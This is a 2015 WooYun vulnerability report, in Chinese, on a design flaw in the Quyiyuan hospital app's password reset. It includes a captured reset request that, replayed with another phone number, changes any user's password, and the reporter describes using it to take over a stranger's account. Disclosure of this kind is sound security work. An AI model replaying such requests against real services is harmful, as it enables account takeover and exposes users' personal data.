当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130394

漏洞标题:趣医院设计错误任意密码重置/秒改(影响200w用户)

相关厂商:上海趣医网络科技有限公司

漏洞作者: 路人甲

提交时间:2015-07-30 12:13

修复时间:2015-08-04 12:14

公开时间:2015-08-04 12:14

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

任意密码重置,秒改//。\\
200w我是看到他们说我才说的。。

详细说明:

下载趣医客户端,再找回密码

1.png


正常找回自己密码,一直到最后一步

2.jpg


然后抓包

GET /APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&APP_UUID=69dec2d5-3b15-475f-aeae-dd50aca086f7&CHANNEL_ID=&PASSWORD=2b3587602f13a2dc9631ac271b28200327ac3d0a78aa10e060120bf2d3a22f55a9643c1dee37bd51b968049c4733abf6f834ca5bcbdafc9f9970b7ea75e0b684&PHONEOPERATINGSYS=1&PHONETYPE=MX4&PHONEVERSIONNUM=4.4.2&PHONE_NUMBER=15******99&hospitalID=9310002&isLogin=false&loc=c&op=changepwdByphone&opVersion=2.0.21&operateUserSource=0&QY_CHECK_SUFFIX=abc7bc3db28177aaa2ed89ff600f3a04 HTTP/1.1
Host: app.quyiyuan.com:8888
x-wap-profile: http://218.249.47.94/Xianghe/MTK_Phone_KK_UAprofile.xml
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; zh-cn; MX4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: SERVERID=f0b1f1bc958e444e7f0dff8d5d2fd6f8|1438224266|1438219158
X-Requested-With: com.kingyee.kymh


保重的手机号我人工打了马赛克,

3.png


可以看到这里是true
经过测试,这个包可以无限发送,只要替换手机号即可!
也许有人会问包里面password加密过怎么办
我们可以先找回自己的密码,最后一步抓包,密码就知道了。然后再替换包中的手机号即可!
然后我发现18888888888已经被人注册了。我就改他的试试

8.png


登陆试试

1.jpg


登陆成功

mask 区域
*****^yx*****


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-04 12:14

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

2015-08-04:不好意思,确认晚了。此漏洞已经修改,早起已经有人提过了。